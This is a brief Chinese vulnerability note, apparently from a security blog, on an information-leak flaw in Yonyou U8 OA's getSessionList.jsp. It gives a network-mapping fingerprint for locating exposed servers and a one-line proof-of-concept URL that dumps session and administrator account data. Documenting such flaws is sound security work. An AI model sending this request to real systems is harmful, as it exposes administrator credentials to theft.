Yonyou U8 OA getSessionList.jsp 敏感信息泄漏漏洞
# Yonyou U8 OA getSessionList.jsp 敏感信息泄漏漏洞
## 漏洞描述
Yonyou U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息
## 漏洞影响
Yonyou U8...
Yonyou U8 OA getSessionList.jsp 敏感信息泄漏漏洞
漏洞描述
Yonyou U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息
漏洞影响
Yonyou U8 OA
网络测绘
"YonyouU8-OA"
漏洞复现
登录页面
验证POC
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
- 发表于 2024-07-12 18:45:01
- 阅读 ( 1794 )
- 分类:OA产品
带头大哥
456 篇文章